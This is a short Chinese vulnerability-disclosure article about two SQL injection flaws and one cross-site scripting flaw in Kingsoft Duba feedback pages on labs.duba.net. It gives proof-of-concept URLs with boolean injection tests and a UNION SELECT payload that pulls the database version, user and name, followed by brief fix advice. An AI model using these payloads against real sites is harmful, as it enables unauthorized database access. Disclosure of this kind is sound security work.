大多数朋友不知道金山毒霸多个sql注入及XSS漏洞和修复,今天小编给大家带来金山毒霸多个sql注入及XSS漏洞和修复可以参考下。
第一个:
简要描述:由于变量过滤不严产生SQL注入漏洞 可通过入侵手段 拿到站点权限。
详细说明://labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2。
漏洞证明://labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2 and 1=1。
//labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2 and 1=2。
结果明显不同 注入漏洞产生。
修复方案:过滤变量app。
第二个:
简要描述:过滤不严导致存在SQL注入。
详细说明:过滤不严导致存在SQL注入 有机会拿下服务器权限。
漏洞证明://labs.duba.net/kws/feedback2/his.php?uuid=12B70C061426AAA96F58AE431D180055&app=5%20and%201=2%20union%20select%201,2,version(),4,5,user(),database(),8,9。
//labs.duba.net/robots.txt。
未作进一步测试。
修复方案:过滤参数。
第三个:
简要描述:留言处过滤不严 造成跨站漏洞。
详细说明:留言处过滤不严 造成跨站漏洞。
漏洞证明://labs.duba.net/kws/feedback2/his.php?uuid=12B70C061426AAA96F58AE431D180055&app=5。